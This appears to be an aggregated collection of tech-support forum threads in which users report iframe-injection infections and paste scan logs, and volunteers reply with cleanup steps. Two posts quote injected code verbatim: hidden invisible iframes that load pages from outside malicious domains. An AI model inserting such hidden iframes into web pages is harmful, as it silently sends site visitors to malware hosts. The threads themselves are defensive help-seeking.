here:OTL.txt <-- Will be openedExtra.txt <-- Will be minimizedIn the upper right hand corner ... Read more

Read other 2 answers
RELEVANCY SCORE 38

I have a small network that consist of a about 4 pc's and a web server. There has been some sort of virus infecting my web server. The virus injects my index.html files with malicious lines of codes directing users to a virus infected site. I am thinking that the virus is on one of my client pc's connecting to the server via ftp. I have ran multiple scans on the server and found nothing. Now I am leaning towards the pc's. I have posted the logs for of the first pc to review.Here is an example of the line of code this virus is putting in the index.html file of the websites:<iframe src="http://woocasino.com/s2/show.php" width="1" height="1" style="display:none;"></iframe></body>DDS (Ver_09-07-30.01) - NTFSx86 Run by richard.mcmaster at 15:23:49.85 on Fri 08/28/2009Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_15Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2014.742 [GMT -5:00]AV: McAfee VirusScan Enterprise *On-access scanning enabled* (Updated) {918A2B0B-2C60-4016-A4AB-E868DEABF7F0}============== Running Processes ===============C:\windows\system32\Ati2evxx.exeC:\windows\system32\svchost -k DcomLaunchsvchost.exeC:\windows\System32\svchost.exe -k netsvcssvchost.exesvchost.exeC:\windows\system32\spoolsv.exesvchost.exeC:\windows\IntelliAdminRC3\Agent32.exeC:\Program Files\Java\jre6\bin\jqs.exeC:&... Read more

A:Infected with Iframe virus

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

Read other 2 answers
RELEVANCY SCORE 38

Problem: I upload to websites from work, home, and satellite office. I installed Filezilla FTP program to upload to all three locations about 3 months ago. Mid-June, my websites started indicating they were virus-infected when opening them up through a browser. At work I have McAffee Anti-Virus and at home I use AVAST. The AVAST is telling me I have a Trojan HTML:IFrame-HY [Trj]. From what I have read with the Filezilla problem, the iframe injects into the index pages of a website. On my index.html page, it creates a frame or space that causes my page to appear jumbled. On the index.php pages of my company site, it causes a PHP error message (I have a php calendar and a php quiz).

I tried uploading over these (through my file manager online) and the errors came back. I went online through my webhost and opened the files up through the file manager, deleted the code and pasted in what I thought was good code for the php pages. I did see injected code on this page before I deleted it and made a copy of it. This seems to have worked for the php index pages but my index.html page is still throwing virus warnings ? I can?t see any injected code in that page.

For what I understand about the Filezilla, it doesn?t protect the FTP passwords. I have another small website I work from home on and I deleted all of the files through the file manager online and uploaded what I believed to be cleaned files after changing my FTP passwords. When I previewed it in the bro... Read more

A:trojan HTML:IFrame-HY

bumping

Read other 1 answers
RELEVANCY SCORE 38

I just discovered an issue with the 64bit version of internet explorer. When loading a PDF in a iframe it won't load but rather it will download in a separate acrobat reader window. I suspect this has something to do with the browser operating in 64bit and adobe being a 32bit application. You can simply avoid the problem by opening the 32 bit version of the browser from "C:\Program Files (x86)\Internet Explorer\iexplore.exe". We place a shortcut to the browser that loads an internal intranet site and I recently discovered this. Hopefully this info will help someone else out.

Read other answers
RELEVANCY SCORE 38

I recently went to a website and my NOD32 came up with a Iframe.b.gen warning.
I immediately did a full scan on my computer and found nothing, but it would put my mind at rest if someone could have a look at my log files.

I ran gmer but the text files came up blank

.
DDS (Ver_11-03-05.01) - NTFS_AMD64
Run by Darren at 21:13:27.69 on 24/03/2011
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_24
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.44.1033.18.6135.4461 [GMT 0:00]
.
AV: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\ESET\ESET NOD32 Antivirus... Read more

A:Iframe.B.gen virus warning

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

I'm not seeing anything in your logs. We'll do an online scanner to check for remnants shortly.

------------------------------------------------------

Advanced SystemCare

We do not recommend the use of registry cleaners. Our colleague miekiemoes has an excellent writeup here

We suggest uninstalling them via Programs and Features in your Control Panel.

------------------------------------------------------

Please uninstall the following via Start->(or Computer)->Control Panel->Programs->Programs and Features if it still exists:

Coupon Printer for Windows<<Please read here

If you decide to uninstall it, also delete the following Folder if it still exists:

C:\Program Files\Coupons

------------------------------------------------------

Please run this online scan to help look for remnants. Ensure your external and/or USB drives are inserted during the scan.

In 64-bit Windows Vista/Win7, you must open the 64-bit IE browser.

Navigate to C:\Program Files (x86)\Internet E... Read more

Read other 2 answers
RELEVANCY SCORE 38

Hi, thanks for being there!

My system is xp sp-2. Followed all instructions. Scan logs follow.

Thanks again for your help!

Regards, Bfree

Deckard's System Scanner v20070809.63
Run by afriscribe on 2007-08-17 at 01:49:17
Computer is in Normal Mode.
--------------------------------------------------------------------------------

Total Physical Memory: 480 MiB (512 MiB recommended).


-- HijackThis (run as afriscribe.exe) ------------------------------------------

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:52:21 AM, on 8/17/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\a-squared Free\a2service.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\Program Files\ewido anti-spyware 4.0\guard.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Microsoft ActiveSync\wcescomm.exe
C:\Program Files\Adobe\Adobe Acrobat 6.0\Distillr\acrotray.exe
C:\Program Files\Qlock\qlock.exe
C:\PROGRA~1\MICROS~3\rapimgr.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\Explorer.EXE... Read more

A:Hacktool:Exploit/iFrame etc

Hello, and welcome to the HijackThis Help Forum.

Apologies for any delay in replying, but we have been rather busy lately. You may wish to Subscribe to this thread so that you are notified when you receive a reply. To do this click Thread Tools (above the first post), then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Please let me know if you still need help and I will assist you. I am subscribed to this thread so I will see any reply you make.

While you are waiting for my reply, you may also want to read "Who is Helping you?", which will help you understand where we go from here.

Thank you.

Read other 1 answers
RELEVANCY SCORE 38

I have Exploit-IFrame trojan on my machine.
I only enocunter it when going to my own websites.
McAfee finds it and deletes it and shows me its location, I follow it and do not see the offending trojan, and the suffix changes each time it is found and cleaned both on the AOL and I.E. browsers.
I have run Ad-Aware SE Personal, AVG 7.5, and a complete McAfee scan - nothing found.

Step 1. None of the Malware listed, or Rogue programs exist on this machine.

Step 2. Run Panda ActiveScan.

Step 3. Downloaded and Installed Spyware Blaster from Desktop.

Step 4. I have SP 1 and 2 installed already.

Step 5. Downloaded Deckard's Systen Scanner to Desktop

Panda Activescan

Incident Status Location

Adware:adware/ncase Not disinfected c:\temp\FLEOK
Adware:adware/sidesearch ... Read more

A:Exploit-IFrame trojan

dss.exe encountered a problem and had to close

Read other 2 answers
RELEVANCY SCORE 38

My stepson has downloaded a virus onto my laptop.
I ran a full scan using malwarebytes, superantispyware, & avast and removed everything they found but my computer still isn't working properly.
The task manager has been remotely disabled and i can't seem to turn it back on, i cannot sytem restore, & everytime i open a new web page avast flags up as finding a virus 'HTML:Iframe.inf' as many as 5 times per page. (When I ran avast it found over 1000 of these).
I am including a hijack this log
I really need help here as I don't know what I am doing when i get beyond the basics.
Thanks in advance and here's the hijackthis log

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 23:02:02, on 02/02/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16762)
Boot mode: Normal

Running processes:
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\acs.exe
C:\Program Files\Google\Common\Goo... Read more

A:I can't get rid of HTML:Iframe-inf virus

Hello and welcome to TSF.

HijackThis is not used as the initial analysis tool in this forum.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Read other 1 answers
RELEVANCY SCORE 38

Hi All,

I have many (Url's & Htm) saved web pages in my PC
Suddenly ESET is detecting this alert in all of them (strange)
HTML/Iframe.B.Gen Virus

((i attached a photo to explain it))

I felt frustrated when I got this Alert
HTML/Iframe.B.Gen virus

And the only solution in ESET mind is to DELETE them .. not clean not disinfect..
isn't there any other solution to disinfect this virus ... that if the virus is really there ..

ESET is blocking opening them (The url or htm) .. the only way to open it is to disable the antivirus ..
and when I do that .. nothing wrong happen..

HELP PLEASE !!!!

((by the way: I dont want to zip any of my Url's and submit it to ESET, I want a solution how to disinfect this virus))
I tried Combofix, it didn't help

A:HTML/Iframe.B.Gen Virus (( HELP )) !?!?!?

This is the Photo

Read other 4 answers
RELEVANCY SCORE 38

I'm using a little javascript to create iframes, resize them and append them to divs on a page. I got it working in FF and in IE6 and 8 but today for some reason, the iframe loads in IE6, but the javascript in the iframed file doesn't run. The iframed files open/run fine when their url's are clicked in the directory where they are located.
I was monkeying around with a script that resizes cross domain content, but
I undid any changes I made before this happened and as far as I know I didn't change anything else that would affect this.
You can see the test page here-the iframed files are on the same domain:
http://webbrewers.com/recentposts.aspx
In FF, the comments boxes open onload and their contained script runs , in IE6 the boxes open but the script hangs at the opening statement.
Just wondering if anyone else has come across this or can throw any light on it?

A:[SOLVED] IE6 odd iframe behavior

Well, that's embarassing! I didn't make any changes to security settings (I swear), but when I just set them to "low", IE6 works again. I had specifically checked earlier to make sure the settings that allows scripts to run in iframes was enabled and it was. So not sure why, but seems to be okay now.

Read other 1 answers
RELEVANCY SCORE 38

hi, i'm developing a site that uses iframes for some of its features.
the problem is with the session variables. it seems that, if the "Always allow session cookies" form the "Advanced Privacy Settings" from IE privacy options is turned off, the session lost its id. so, the session values are lost from one page to another.
i'm trying to override that setting for this site only. someone knows how?
maybe some protocol or certificate, i don't know.
the use of iframes is out of discussion.

Read other answers
RELEVANCY SCORE 38

Well my site runs on IFrames, and now I want to submit my tutorials to certain websites. However, they say I can only submit the actual URL leading to that tutorial.

So my questions is, is there any I can make a link so it goes to website (with the layout) AND the exact IFrame? Something like www.mysite.com/outer_layout.php#actualiframe.php (I realize that doesn't work but you know what I mean.)

Thanks
 

Read other answers
RELEVANCY SCORE 38

I have run eset online scanner tool and it identifies problem as HTML/Iframe.B.Gen virus and JS/Exploit.Agent.NHC trojan.  The eset tool never completes its scan.  I have run Malwarebyte's and Rogue Killer.  Each removed some other malware but repeating those scans don't find anything now.  PC is very slow.  I have attempted to run CCleaner and it never completes it's analysis when scanning for temporary Internet files.  This is an office PC.  QS1 and Integra/Docutrack are legit applications.
 
Thanks for any help provided. 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 NETWORK
Internet Explorer: 8.0.7601.17514
Run by NSSUser at 8:48:44 on 2014-08-07
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3998.1045 [GMT -4:00]
.
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\mfevtps.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\ctfmon.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Program Files (x86)\Task Killer\TaskKil... Read more

A:HTML/Iframe.B.Gen virus

Hi there,my name is Marius and I will assist you with your malware related problems.Before we move on, please read the following points carefully. First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding. Perform everything in the correct order. Sometimes one step requires the previous one. If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem. Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me. Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts. If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed. Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean. My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.  Please upload attach.txt as well and do the following:   Scan with Gmer rootkit scannerPlease download Gmer from here by clicking on the "Download EXE" Button.Double click on the randomly named GMER.exe. If asked to allow gmer.sys driver to load, please consent.If it giv... Read more

Read other 16 answers
RELEVANCY SCORE 38

Ok I've got an iFrame on website and I want a link to open a new browser window from the page in the iFrame when it's clicked on so it doesn't take you away from the site.

_blank loads the entire page in the iFrame
_parent opens the entire page in the browser window that I don't want the person to be taken away from...

HELP!! It does this in both IE and Mozilla Firefox...

This one has me totally stumped!
 

A:Solved: iFrame problems

I belive "_new" should work.
 

Read other 2 answers
RELEVANCY SCORE 38

It would appear that I have this virus, however ESET won't get rid of it. I've run through a full ESET scan and a comboxfix scan to get the logs, but it remains. Here is the comboxfix log (I know I was supposed to wait, but I didn't, so here it is)---Any help you can provide would be much appreciated

ComboFix 12-03-07.05 - jeffrey 03/07/2012 12:02:41.9.4 - x64
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1033.18.3891.1855 [GMT -5:00]
Running from: c:\users\jeffrey\Downloads\ComboFix.exe
AV: ESET NOD32 Antivirus 4.0 *Disabled/Updated* {CB0F8167-5331-BA19-698E-64816B6801A5}
SP: ESET NOD32 Antivirus 4.0 *Disabled/Updated* {706E6083-750B-B597-533E-5FF310EF4B18}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2012-02-07 to 2012-03-07 )))))))))))))))))))))))))))))))
.
.
2012-03-07 17:10 . 2012-03-07 17:10 -------- d-----w- c:\users\Public\AppData\Local\temp
2012-03-07 17:10 . 2012-03-07 17:10 -------- d-----w- c:\users\Default\AppData\Local\temp
2012-03-07 09:05 . 2012-03-07 09:05 69000 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{482AB6A2-8D49-42D9-8C76-E616CD14062A}\offreg.dll
2012-03-06 15:36 . 2012-02-08 07:13 8643640 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{482AB6A2-8D49-42D9-8C76-E616CD14062A}&... Read more

A:html/iframe.B.Gen virus

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps.===Your ComboFix log is clean.The type of infection you are seeing could have been incorporated in a all your .htm or. html files.You probably got this type of error message.http://www.wilderssecurity.com/attachment.php?attachmentid=212754&stc=1&d=1254737545Open the file with notepad copy the content and post it here for my review.You should also send the report to ESET for there review.

Read other 2 answers
RELEVANCY SCORE 38

I appear to have had an infection and am hoping my system is clean. Please confirm that for me. Attached are the dds and gmer logs.

Here are the details. I am using Windows XP Professional SP3. I run the automatic update and apply all security patches. I use the Windows firewall and Avast!Free Antivirus.

I learned that my gmail account was hacked. It had been accessed via a mobile device from another country and used to send spam. I followed the instructions on Google to secure my account. Then I ran a boot-time virus scan on my home PCs using Avast! Free Antivirus. On one of my PCs it found 3 infections, all in HTML files. They were:

HTML:Iframe-inf
JS:Downloader-APK[Trj]
JS:Redirector-JM[Trj]

The first file was a web page I had previously saved to my hard drive. I let Avast quarantine it and then I removed it manually. The other two files were in the IE cache. I let Avast delete them.

I started to drag and drop my files to an external drive as backup. I discovered a file "usrusmt2.tmp" that interfered with the copy. I googled it and found that might indicate malware. (I had an external USB drive attached so this may have been a mount point, that is, if Windows has such things). Subsequently I unplugged the USB drive.

I posted on the "Am I infected" forum and was advised to run Superantispyware and Malwarebytes. I logged in as a different user than I normally do. I ran the former, it found no errors. Then I deleted the usrusmt2.... Read more

A:Downloader/redirector/iframe

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. To help Bleeping Computer better assist you please perform the following steps:*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/421404 <<< CLICK THIS LINK If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.*************************************************** If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lo... Read more

Read other 13 answers
RELEVANCY SCORE 38

Malicious IFrame on Gadgetadvisor.com.

Are you a gadget geek? Do you often seek advice from Gadget Advisor before making a purchase?

Our (F-Secure) Web Security Analyst discovered a malicious IFrame on the popular tech website that redirects visitors to a malicious website.

-- Tom
 

Read other answers
RELEVANCY SCORE 38

I am using windows XP SP3 with ESET NOD v 4.0.437.0 and firefox 3.5.19

When I access some websites lately ESET NOD reports some viral activity and blocks access to a third party web address. The problem is repeatable on a these websites then seems to go away after a day or two and a similar problem may occur when accessing a different website.

One example of the threat warning is:

Object:
http://jclao.com/archives/1283

Threat:
HTML:Iframe.B.Gen virus
Connection terminated - quarantined

A second message then appeared:

Address has been blocked:
"www.jdbbank.com/gadgets/gadgets.php"
IP address:
61.19.241.97:80

The website owners claimed they have checked their site with several checkers and found no virus. although jdbbank did have a legitimate link on their site.

I later got a simialr message from a completely unrelated site (cme.com) so I became suspicious that my computer may have some malware. That access reported activity by the Kryptic.E trojan, but I did not manage to copy the full details.

I ran a full scan with ESET NOD32, but found nothing.

I ran the steps in your prep guide. The DDS log is pasted below.

The attach.txt and GMER log files are attached.

Note the GMER log took nearly 12 hours to complete.

.
DDS (Ver_11-03-05.01) - NTFSx86
Run by Nick at 18:19:06.98 on Thu 05/05/2011
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_23
Microsoft Windows XP Professional 5.1.2600.3.1252.61.1033.18.1526.524 [GMT 7:00]
.
AV: ESET NOD32 Antiv... Read more

A:Iframe.B.Gen and or Kryptik.E virus

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

Read other 18 answers
RELEVANCY SCORE 38

I am using an iframe for calling other websites. I want to disable right click in this Iframe. Can anybody help me out in this.
 

A:Help! To disable right click in Iframe

It'll only work for people using IE and I think you'd have to disable it for the whole page and not just the iframe. Plus the IE user would have to have Javascript turned on for it to even work.

Other browsers have options to block you from doing evil stuff like that.

Also, keep in mind that for security reasons, browsers are very picky with what you can do with an iframe if the site loaded in it is not on the same server/domain as the page.
 

Read other 1 answers
RELEVANCY SCORE 38

Hello,Two days ago AVG?s resident shield announced a chura virus when opening Firefox. I searched and found the line <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> in a HTML file just before the body closing tag. I made a search with Vista search (very slow) and found 59 HTML files with the same code on the same place. I scanned the computer with AVG and then with Anti-Malware, Ad-Aware and SUPERAntiSpyware. No way, they found just a few small problems that were taken care of. I removed that line of code from all files, but when I made another search there were over 150 infected files. I repeated the cycle (search, clean the files by hand, AVG and the others). This time AV and AS found nothing! I made a third search and now there were nearly 2000 infected HTML files. I can?t clean so many files by hand, and from the previous experiences it was worthless because all the files I had cleaned were infected again.I have a site and its files on my computer are now infected. I cannot access the site because I am sure to spread the virus all over and also distribute the virus to whoever visits. Not better is the fact that I save many files in HTML because I find it practical, so I have many HTML files. Even worse is that the infection is not on the start up HD with the OS where I could just reformat and reinstall or replace with a saved image, but on another HD where I have all my files and the site files. The C: disk has only ... Read more

A:<iframe> chura virus

Hello Straydog,In checking web references on the type of infection you posted here I see, as you probably have, a trail of discussions going back to perhaps March, and few with any direct confirmation of the infection sources, or complete solutions. However, in some of that web info I see references to "Virto" which is a form of the Virut file infector malware (see here). Virto/Virut injects it's code into all of certain file types on systems, and is so pervasive and elusive in activities that the only best option for a solution is to reformat and reinstall, and all without saving any personal data from the system. If I were a site owner (and I am) and knew my system was infected with such a virulent malware (which has happened to one of my systems), I would reformat and reinstall, and regroup after as far as how to return needed settings and softwares etc. We can do some scan/checks here to see what all still needs cleaning, but up front, should there be any verification of Virto involvement I will end all assistance, with the correct suggestion of that reformat/reinstall solution.For the website, send me via PM the site name, so I can evaluate it's current status. Plan to only access that site from some other computer that is known to be malware free, and also has not been used before to access the site's web program (such as cPanel). From a different computer right now, change all control panel/site passwords. You can assume the site's security has been compromis... Read more

Read other 7 answers